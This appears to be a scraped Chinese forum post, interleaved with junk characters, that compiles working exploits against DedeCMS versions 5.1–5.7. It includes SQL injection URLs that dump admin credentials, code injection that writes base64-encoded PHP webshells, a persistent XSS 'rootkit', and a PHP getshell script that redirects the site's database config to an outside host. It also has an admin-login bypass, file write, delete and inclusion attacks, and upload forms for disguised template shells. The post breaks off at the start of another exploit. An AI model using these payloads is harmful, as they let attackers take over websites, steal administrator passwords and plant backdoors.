|
|
. }( H- ?- F3 Z! cDedecms 5.6 rss注入漏洞7 c- X9 N0 }4 d. Y$ G# m
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
4 t$ n3 X. G7 H$ V2 H6 v; @. P- B6 d# [6 w+ i
# Y$ ?/ m: L8 ?0 l
+ b' {( `+ ^3 }. o$ T" ~5 g
/ F, e9 B: N8 r7 `1 o9 e
5 Q( n1 x& K% \! _: m$ h: q9 |2 q+ f8 J
, A* C3 ] Y& }" u: i7 R: E% B( W( E
DedeCms v5.6 嵌入恶意代码执行漏洞
/ d/ l- Z$ h7 v* B注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
2 n* E2 G }' A" k, ^3 L' A% n发表后查看或修改即可执行
W% R# ]9 Y2 l4 Xa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
) W1 @, i; {8 d3 o* @5 _生成x.php 密码xiao,直接生成一句话。
, a9 E e4 ?" M0 [$ n! m* e7 K! O" m( h5 f Y* w Y5 ]
@6 J& f! X8 K" W) p2 s
3 m% B9 n8 |+ _! q* @- a9 p
/ \+ @7 g( J8 O0 e( u2 A, t$ f, z7 n
" ~, n1 z+ a, W- ~8 p
; {' m* ~! t1 A& Y+ L
2 B2 Z; W$ e3 B/ J: o6 Z% N; F! KDede 5.6 GBK SQL注入漏洞) o2 |4 H9 B) K: s% z
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
/ W9 h( m. A- A: @9 K Ihttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe: P/ _# k2 \% l
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
f9 p7 i! M, D! W0 }% Z; B1 I! a
) f5 _; F2 q' G9 j* S* `" T8 x- G& ]! B7 D
, ?, p! h& Z8 a8 E/ F3 O
4 m" N: x1 m! M3 s/ y
8 V1 e _: F/ O. m
9 e% | \2 P: \' B8 ]- A' V& o5 f( ~% C/ u. G! \- k3 y
* }" H2 n% Z2 B. @5 o& d; GDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞' b: P$ ^4 L$ \2 G' F) j3 d
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 5 H8 H- ~3 O& W5 I+ l
r( u, h/ v: {4 O9 B
$ l$ V; K# B% X9 p
1 r" `( U/ J/ B3 Y( E
- e/ n& ^% \, Q5 F2 J2 p/ D1 X
4 P& a2 v: W) q6 S8 t2 g% Y0 d
4 T6 o, o) W: G: M! T" cDEDECMS 全版本 gotopage变量XSS漏洞
2 Y f* S2 c+ o1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ! Y& `* K2 g! j8 f4 b
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="; Q: u" x v7 C+ T& X8 u6 y C) D
e3 z: E6 K- A0 D4 L
/ ?5 ?$ B7 \' Q! M1 M2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 # O4 [* ~; f& ^
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda8 [1 @3 S: ^$ y) c4 c* c) M
2 @2 ~1 Q! F3 ~# T. D$ T7 U3 r+ T7 c0 u0 k" n
http://v57.demo.dedecms.com/dede/login.php: N5 M) n1 ~; W8 M/ g
b" o+ R I3 A* k" b+ k& j
" _, z0 S7 d' |8 O) u# |9 M
color=Red]DeDeCMS(织梦)变量覆盖getshell; {1 f2 W& a4 u
#!usr/bin/php -w9 E8 C2 o4 o2 W& a
<?php* b) r+ w0 k( o( e& U4 k; J3 }
error_reporting(E_ERROR);0 ]4 d: I7 g4 y0 }
set_time_limit(0);+ h& i6 h8 L; s* w) V
print_r('+ I' v& v; n9 U. T5 y" J
DEDEcms Variable Coverage
' @# Q& G" t& _' c ^Exploit Author: www.heixiaozi.comwww.webvul.com
! R$ Z0 G$ l+ A) z$ v);
N9 c4 Z( B' K+ \( x% T* ]echo "\r\n";
; g4 x$ m; i7 z' h5 v2 o: yif($argv[2]==null){* w4 L, }0 l" ]8 Z! v
print_r('4 J) W* R5 ]9 y% N% z i4 `' Z
+---------------------------------------------------------------------------+, }2 D+ t5 V/ {9 c
Usage: php '.$argv[0].' url aid path. S+ R$ |4 ?$ g/ m# _7 f6 _" ?
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/$ s: g! @5 ~" P# J; d. e( s9 b1 o6 x
Example:
2 u2 _* E- i" g' r; e/ pphp '.$argv[0].' www.site.com 1 old' j Y/ ?, w4 @6 {+ F* f: Q
+---------------------------------------------------------------------------+' E2 H- v7 h7 K2 p
');
5 c0 T) T1 E z; B. ]exit;8 l' U5 [& a: |% N- ?
}
1 E6 s& O) N4 j- T$url=$argv[1];
, N; s, N3 ^) M: v7 q1 \6 y$aid=$argv[2];, i7 y7 u0 W% r
$path=$argv[3];( {1 G, ^% [3 B1 A+ r
$exp=Getshell($url,$aid,$path);
, Z! a& r( I4 x0 Pif (strpos($exp,"OK")>12){8 _ b: K7 J; a- ^% D( U
echo "2 b% x# F* ^& H/ q
Exploit Success \n";: X, @! f0 Q# {
if($aid==1)echo "7 C7 l# z# I* Z9 J5 J) _6 K
Shell:".$url."/$path/data/cache/fuck.php\n" ;
+ F+ q7 p3 j8 B8 e- q T' P' ]! W0 H9 t2 D2 D8 y5 V2 D9 K5 O K" p
% n3 k. J8 \1 p# U L; R. n! y
if($aid==2)echo "
0 t5 U5 `$ w5 J$ S. g, n3 ]& gShell:".$url."/$path/fuck.php\n" ;8 N: H1 Q. K0 r/ L4 n0 C0 H
( t8 x/ E+ x4 Q' v$ H0 i6 q, w9 Q2 O$ _$ k3 j( V! L
if($aid==3)echo "
1 G1 o o" r/ m& o/ e2 K& AShell:".$url."/$path/plus/fuck.php\n";. K6 i6 h1 M$ S7 p
9 m* r9 `' K) i/ L; r$ ]
( ?8 w1 M5 p: g) q6 Q, v6 [}else{
4 R& R7 Z$ s8 _! [2 q4 G) b& Zecho "
2 Y& k2 Y! ^2 Q7 ~Exploit Failed \n";+ A* `$ W% L3 s& M
}% h9 B5 \# t& b0 E# N/ T; {
function Getshell($url,$aid,$path){
3 @5 A9 f- o& r$id=$aid;
4 m0 s W1 x, A" u5 N$host=$url;
" b* m8 K) y' g3 ?/ ~' S0 S$port="80";
4 `2 {$ e; [1 M* @- x$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";9 q# X$ a, j2 v0 L, a% z; ^* Q
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";( k: f4 J% A) d0 o7 @) [
$data .= "Host: ".$host."\r\n";
3 l2 h" M2 ~7 l: N4 r; A$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
. ^$ B `2 d: j+ f0 L" x1 [( `$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
( u- V! V7 Y4 t$ e- _$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
+ r% n4 A- L1 K! j/ z' J//$data .= "Accept-Encoding: gzip,deflate\r\n";7 a& G( h" {9 g4 E4 p
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";6 O0 H' q; d* ~$ s3 o2 F* e
$data .= "Connection: keep-alive\r\n";7 s4 e9 n3 s5 ~ J
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";; l" D/ N4 K) \# ^" e
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";/ n; X5 ?( I3 c: `, G
$data .= $content."\r\n";) O3 ?1 h2 Z! s n: |
$ock=fsockopen($host,$port);% P5 e! K8 E8 Y' M9 I
if (!$ock) {$ {& A# }( v4 u+ y8 U
echo ") |% L0 G: { E
No response from ".$host."\n";5 l6 _; a" q% V# T9 y A0 c4 O
}
0 H* k8 d: N- Zfwrite($ock,$data);+ }9 E1 H# f& T* l4 z+ }7 }7 F
while (!feof($ock)) {% h' Q9 D5 }. q9 k' _
$exp=fgets($ock, 1024);' Q3 v( Y& z2 K3 @, g% t0 n
return $exp;4 @4 a; F& c1 R% {/ O! h8 s
}
" X1 H9 n+ V$ s}
* l2 S8 x" a4 [, f1 \3 C3 H- Y, n% @& l9 X+ ]3 F/ E) }$ m, D: n
/ X G9 z/ N/ W
?>4 ~% O5 q# Y, L& `
& H; j/ h- U* A7 c$ M; F6 N* ^ }1 O: Z2 \
. A7 B* v3 C, X8 q/ m
' l" U% R R) l; U9 m3 h
7 q: E# e1 a$ |1 X5 z$ b# P: A& t3 T) D* J- m: O& R
" ^) Y! B i" X- I$ ]
! `$ T! _* m- e# O! f, J! E/ d& p7 l" s+ @: e& N
+ r! S6 P- {' |. X" k; P
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
$ @5 Z) T& _" K" N w7 A1 ~/ Lhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
" X; B$ e) _6 ^% u2 U, H7 q
) ^5 P- ?. a0 i
( F' F6 s2 v$ Y- K2 V把上面validate=dcug改为当前的验证码,即可直接进入网站后台
0 c& |$ }' p8 h3 @; ?. u# E6 ~
) b* R1 v) @1 g7 G8 c% H( `
3 C* Y1 p* v7 Y! G- e+ n& k此漏洞的前提是必须得到后台路径才能实现/ o8 S4 m; W1 }7 e% O
, m. L' H# e& z: M( T6 _& B
) q8 a5 k3 V1 p0 u% A5 \: X; x- F U0 w/ I9 q+ N: e3 K) N2 J; l5 s& [
( W! C( H0 C4 L" ?
9 p& c; \" X/ U3 ^! c# r
/ _/ B% k6 X w/ P8 n8 U3 p8 X/ ~$ x/ i6 v3 u2 A
' r. p, v k" y3 T5 T# x: @
- p1 u7 J5 }1 N1 ]6 l0 `. s
0 z$ A2 g, i$ j U, l
Dedecms织梦 标签远程文件写入漏洞
" E2 v: o2 `% U( t- ?% ]# h前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');9 U5 R ` @1 u9 m/ C) y
f. s/ \5 l4 x( l% U
; }1 v9 I; T9 |! s/ M再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 ( D% t9 f: X I) E" l
<form action="" method="post" name="QuickSearch" id="QuickSearch">
7 _' ^# O& S1 P( L8 u7 x7 r<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
# q6 \" {2 t7 j7 B4 L2 h<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
) C3 n7 d" G% u `2 k<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
% ]" m$ F$ Q8 q9 P<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
! S9 N/ h* T* N2 I) B<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
6 P. |8 N1 O0 L* h% ?<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />$ ?% F9 c7 k' N8 l' B% w
<input type="text" value="true" name="nocache" style="width:400">
+ l s/ m6 }8 {- a6 v9 W<input type="submit" value="提交" name="QuickSearchBtn"><br />5 `# Z0 x2 N! h
</form>
, N& R5 G: ~6 y: l0 ^5 y1 c8 X<script>
, v. }: Y" E7 R- N) mfunction addaction()1 ^# o, q7 c8 A( g0 A D( [' N
{
. f3 b1 ?& ?2 I, E7 e# Ldocument.QuickSearch.action=document.QuickSearch.doaction.value;
: Q% r7 O' r' `) a' ]3 M' `}
6 u; u( s) n; T7 j; R0 p/ U7 r</script>
9 h) }. Y# e9 J/ a' n
+ T8 c( _+ a7 i8 A- u* o7 Y. t$ i6 D! e& A5 m6 E" l
5 |! h' D6 W9 Z8 x+ L
' ]( y& V1 L9 T/ j6 c# a* x/ a/ ?
+ g8 ^1 L0 Z1 f* `* o: g3 ~& ~0 e/ Y `" D
: H+ \9 b5 G' l& P3 A; {& Q6 ?
4 F- r0 l2 {6 V
y5 g/ \8 @$ ~# Z$ ^
+ ^/ `9 W1 W7 B; S8 p- M4 R, F, T
DedeCms v5.6 嵌入恶意代码执行漏洞0 z6 G2 j, Y5 K; ~$ H o
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行) U$ V; M4 g, C7 Y
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
! \1 L, ^: |9 r" R3 h0 {: P生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得) P0 R* m0 q; B
Dedecms <= V5.6 Final模板执行漏洞
# D( R+ _. P% R ~' ^注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
& [0 }- K4 I9 M7 t2 J+ Guploads/userup/2/12OMX04-15A.jpg1 j6 D& ~& k- t3 |
2 {* t% N7 A, a2 d) m+ s( y# |
6 t4 }1 ]" v- L模板内容是(如果限制图片格式,加gif89a):
* |" Z8 |! [5 Q! t# i* O{dede:name runphp='yes'}
/ J9 z9 f# m. c$fp = @fopen("1.php", 'a');' |$ T- L6 ?" y0 M l0 M& x
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
2 U* i: j8 V& D* o; g@fclose($fp);) D& P5 q3 x5 ~/ \8 m0 D/ R
{/dede:name}
* l! c/ h" r- T# J2 修改刚刚发表的文章,查看源文件,构造一个表单:/ Q$ M! k' [0 f- c% n
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
1 o9 x' W0 W. J& l! b<input type="hidden" name="dopost" value="save" />
! b5 X* ?7 N" U<input type="hidden" name="aid" value="2" /> k. W1 T' V* X; J# [
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
8 t, ? R ~' @ d5 i$ d<input type="hidden" name="channelid" value="1" />
}8 _% {6 @5 A. {<input type="hidden" name="oldlitpic" value="" />8 P: ]% `5 [. {3 c8 a
<input type="hidden" name="sortrank" value="1275972263" />7 M- D7 ?/ B" S
- g. ?1 c6 K2 |! {
/ ~4 ~) N) @& h0 @$ i<div id="mainCp">8 T- W4 O: w+ V+ P9 s
<h3 class="meTitle"><strong>修改文章</strong></h3>
9 w+ R+ O# X: Q- h2 J% A7 O& W& c: r3 o) T" ~2 |2 e' Z4 @. O& u6 g
; }' l: ^) k6 o
<div class="postForm">% e% S( A4 g: y6 n: B
<label>标题:</label>7 R# U( c+ B7 ?
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>$ F, i, N% |9 x: \+ V
) F" H' k* ~( w# R- J) ?" m" y7 h4 e2 v0 w% _. A5 b) ?
<label>标签TAG:</label> }% y4 F" f9 |2 o
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)& g _1 C/ F6 O! \/ \2 q0 P
# C$ ?4 [) V2 \4 H
6 s$ O7 ?5 D. E5 w: b2 O0 s$ D
<label>作者:</label>' o* X5 o' L' }
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>) d7 k+ e4 l9 Q
1 N( i+ r/ G, {) j0 S% { N5 Y
7 e2 W: R2 b- [, _7 k- q
<label>隶属栏目:</label>0 D K& @' r0 K9 X; h y9 x$ x
<select name='typeid' size='1'>' F3 X) v* Q# J& p! {, `" ?4 Y
<option value='1' class='option3' selected=''>测试栏目</option>
! \, Y6 F4 `; b( k9 f</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
( X% m$ W8 t& L5 J$ N3 `, ~, P3 e2 [: @+ n L4 C
4 B2 R) q! N- }: k: W9 }
<label>我的分类:</label>
' t$ O# g; v/ Q6 Q<select name='mtypesid' size='1'>
, J% F1 A5 w- O/ D<option value='0' selected>请选择分类...</option>! Z# l/ y3 u; l) m
<option value='1' class='option3' selected>hahahha</option>
0 Z% c& h# x! A1 x z2 t$ F. Q</select>
1 Q! _" ^; i+ {% V: B. G# Z
4 B/ f% {! e- N4 @5 d* Z' H$ d, ?. T7 X9 _8 p6 S/ a
<label>信息摘要:</label>
& f8 E: C5 A) V' S3 R# r<textarea name="description" id="description">1111111</textarea>% v) @) I: G2 \/ g5 r
(内容的简要说明)
) g( ^8 a& q8 q5 y- s5 s7 p3 q/ w: @# x
) ?7 M- u" Y; d, B% n {% s+ R
<label>缩略图:</label>
/ s3 {7 i. `; N/ N<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
+ a7 V8 z6 e6 p5 j, v/ z# b) G& j
6 N- ^8 C7 u$ t6 f
<input type='text' name='templet'
, g: {5 F: T* s& B( P! l8 W* P+ ivalue="../ uploads/userup/2/12OMX04-15A.jpg">' C: }5 {8 M+ o8 O; l% t2 p3 ] K
<input type='text' name='dede_addonfields'
* Q& |( a0 M5 ?8 m9 xvalue="templet,htmltext;">(这里构造)
" A) ]4 G) Z9 n; a5 y</div>- P2 v& j: \. b( U" X
. X& o0 x& {9 g6 U
- x& ^. h: \' l1 `" g<!-- 表单操作区域 -->
' u$ v j0 L, c6 k! a+ K: Y3 R5 s<h3 class="meTitle">详细内容</h3>
5 R4 ^9 R Q+ h% k: n
) P* Y6 o0 T' r5 T9 L3 u% i4 c& ]8 @$ t% A) p* Y' G; q
<div class="contentShow postForm">
# k. `- O& L" `3 \( o8 @7 ~! q<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>$ H- Y6 W# I, V6 x! Q* s! t
C" t% {+ K5 ^1 R1 l
( i+ g+ i' F- O7 Z<label>验证码:</label>
4 q7 d" d, _( \9 b) j+ }<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />% S& j( d4 ], X- D
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
* ^+ Z! d* O* r! Q s
0 k1 B, k g/ T; i1 B+ J3 o5 z6 E; d2 h4 U/ _8 C8 i
<button class="button2" type="submit">提交</button>
`. U; Y& L& U5 r1 r$ E& Z<button class="button2 ml10" type="reset">重置</button>8 X* R7 b1 n% f& E3 o
</div>9 l1 v; X c5 [# U7 N
; i: Z6 b9 e+ R: d9 C( R& z' Q5 I
( T; \! R9 e& i! L</div>
! _2 K+ }! D7 O+ ^: `$ w
1 c) j7 b1 f! v
# \7 N' c$ u9 T4 M& M1 k0 f9 R& S</form>
/ I4 {- s) k$ ?: i0 @- y+ X2 U, N0 a" W1 h' d
1 E O6 j5 ? P9 }
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:' k* x1 O- K4 `8 U
假设刚刚修改的文章的aid为2,则我们只需要访问:$ a5 r9 E2 Q) S* h
http://127.0.0.1/dede/plus/view.php?aid=2
2 l3 k. `2 N2 h3 _" a6 o即可以在plus目录下生成webshell:1.php7 {: q/ F3 Z& a# k
/ R" C! N/ d: \4 H7 T: X, u- j5 `9 E8 O! \) j
7 O$ w" }* a i: Q" W# p
, ], _0 r+ d/ ?
q- Y1 Y, |" H9 q/ v' G
0 m& A1 V( k6 n
6 I" ]3 Z1 E% S# a! b7 B( ^) ~- O+ Y4 s/ w- w0 A1 w& p
4 }5 O; u4 ]/ ], V% s. D3 ?5 T% q
+ R0 i8 b" L' o1 F. H$ ^+ s( n# ~
! [' C# Y5 I( s8 [) w) ~4 wDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)" G3 ?4 ?/ G, s
Gif89a{dede:field name='toby57' runphp='yes'}
5 N% h0 w9 L9 P+ a: w# qphpinfo();* Y3 K/ V t$ j$ s k% j
{/dede:field}
0 P3 q# `6 u+ K9 x3 S4 K保存为1.gif* e+ v- Z- k6 ?4 z/ W) T2 K
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> # o- T7 `% Q" s+ p1 b/ d) o! T8 Q% }
<input type="hidden" name="aid" value="7" /> ) D+ T+ v+ t6 W1 e6 n/ h: @
<input type="hidden" name="mediatype" value="1" />
/ @$ V" u4 m1 n<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
3 ~9 p2 Q" B" O9 p7 ~" C1 ?/ v$ {6 ^<input type="hidden" name="dopost" value="save" />
* O7 z5 J- n% q<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 7 S* X2 R+ h4 W( F5 s" @ R* e2 k
<input name="addonfile" type="file" id="addonfile"/>
' V# P( y& ]; F# S w6 a<button class="button2" type="submit" >更改</button>
1 K, `; q. ]: ^4 o</form>
6 o1 T) B2 n1 h. x' S4 \8 h
6 \* D) N" B5 p2 ^! _5 T5 A5 T- v+ Y# G8 P6 s ]: U
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif: q9 F8 i* q9 k% s" B! }
发表文章,然后构造修改表单如下:$ f, y5 f' G6 H6 `* j
8 d1 A- N# T+ \ Q* f$ ?4 K
' H% H; O4 @- e5 i0 |
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> " G5 Y4 E4 w; P( M: {1 _# U
<input type="hidden" name="dopost" value="save" />
7 t- F/ b/ a! D1 ^<input type="hidden" name="aid" value="2" />
; v2 a3 C! @7 h9 R1 T( q$ _<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> # s: k$ P8 `0 D6 n8 s
<input type="hidden" name="channelid" value="1" />
' ~- q: c+ i5 j# H; [<input type="hidden" name="oldlitpic" value="" /> ! k. E, z) N f! a& r+ a
<input type="hidden" name="sortrank" value="1282049150" /> 1 w, g$ u) M3 t
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
$ x; e N4 `" z$ w0 o/ p1 d. v<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> - @3 i- m$ C( M6 e
<select name='typeid' size='1'>
# p( }6 u) o) I& e! q<option value='1' class='option3' selected=''>Test</option> & ^) Z1 g; `" i' H0 F+ T- J, U
<select name='mtypesid' size='1'>
/ A& @: z; e1 d! u) \9 H$ i, i<option value='0' selected>请选择分类...</option> 7 g4 e" T: [# V" w
<option value='1' class='option3' selected>aa</option></select> 9 M$ R" _% p# i7 L" Z+ ~2 \) l0 U
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
/ r7 O3 v# m5 C2 g: x6 Z# u<input type='hidden' name='dede_addonfields' value="templet"> ( r; z' F1 p; _+ N
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 9 b1 h3 N6 j/ b
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
# Q3 n% b7 V& |( H6 S<button class="button2" type="submit">提交</button>
, b9 a$ S: {/ q N</form>
) L. W7 \! V/ j! K: b. \8 \; o3 T' |/ m: o
$ }( z/ E6 G6 j. o0 l
# r k$ H4 c' s, C5 o- p
& o$ s' p3 {2 T( F
% K- @7 g, Q$ b4 R: |" m5 d, j- H. s) w% n7 e; |
# o- S7 E7 ^- Q
: O2 P% C. Q7 M, w
; {5 o: H% R/ @
' F% O, A$ {0 i- m
) q/ g. W; |+ g8 s9 s" L7 L! m [6 E) c1 Q& v+ o! W! G1 e7 T* h
织梦(Dedecms)V5.6 远程文件删除漏洞; Z1 Y* Y+ T( }
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif& T' V; l; a' |1 L! l4 [
4 u2 C* ~' }' l# ~- H' _# P: |3 @" O+ U7 k& f @; \
( s! ]: m# y% P% v# ~ f
) b* U& I1 y7 @( g/ P" R
% a5 y0 S k" Y0 G; C/ Y+ O r z- E. m2 f/ P6 B
& F) f/ e9 L9 [3 x# Q
: b0 ?1 A" T7 w1 M2 E+ C
5 [$ h' l7 J( X3 X+ \' n8 r9 B1 k, M* s) N: ?) i
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
& w8 H& w' {0 f) X9 n+ P; L: ihttp://www.test.com/plus/carbuya ... urn&code=../../( L$ n J# Z* i6 T" A
3 a+ ?8 E N. t. H5 n9 o' j7 b
: Y3 r) ?. z4 D: Q9 D. ?( f. ^7 b3 U0 {' a8 w
6 g& P/ F& K' s; {* a) ?+ e
, c8 H0 n8 H/ l( B
& N' r8 u7 v, @7 v( D* n
+ J' g* [: i* @, M0 i9 A9 i N4 k4 d' e/ s0 F. m
+ P: E- s* ?# |
+ k: G0 h# x# \ i
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
3 E4 P% `# c, S% x0 fplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
, b& |7 ?* m! O密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
2 g' S5 u$ ` e
_7 H7 b: H5 k8 _- d( T/ h9 U* v' N1 u, V5 P7 C& d0 w2 K5 C
3 r, _( d2 @' `6 N6 g1 V2 m! K
: @7 h2 Q2 J: `2 u! v) ]. K. n& Y; J) S0 S2 f3 F
5 S! x5 g4 x" p o& w
( l0 B. s2 F9 Q
! i0 {( {0 K9 C2 z/ v, W! X5 d* N$ [8 S
# U A) E! ~$ M9 x
3 g0 e0 z( O" A& E5 v
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞% d2 c# _4 a1 G' w
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
7 E3 q( J$ q) V$ L9 G3 y1 y# t8 p+ A* g) v- E% X' N
, T3 i0 C; X9 K C" x$ F, s
3 o! b5 ~$ H( r c v b6 h5 m: N2 w5 t4 y
* ~1 u- w+ Q- H- j" w: q5 y
7 K" R1 Z$ m# @! Z) T$ S
; u" r' Z% f. e8 K
6 @- l* H! |5 j% x) `/ N, i( v1 T$ v' F' M. V
5 _6 L b. a' W# F- L( p3 S% T' I
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
* y; e1 J- S; o3 a# \<html>
. q5 l( j9 Z' L<head>
' M+ n/ j" g" O1 l<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
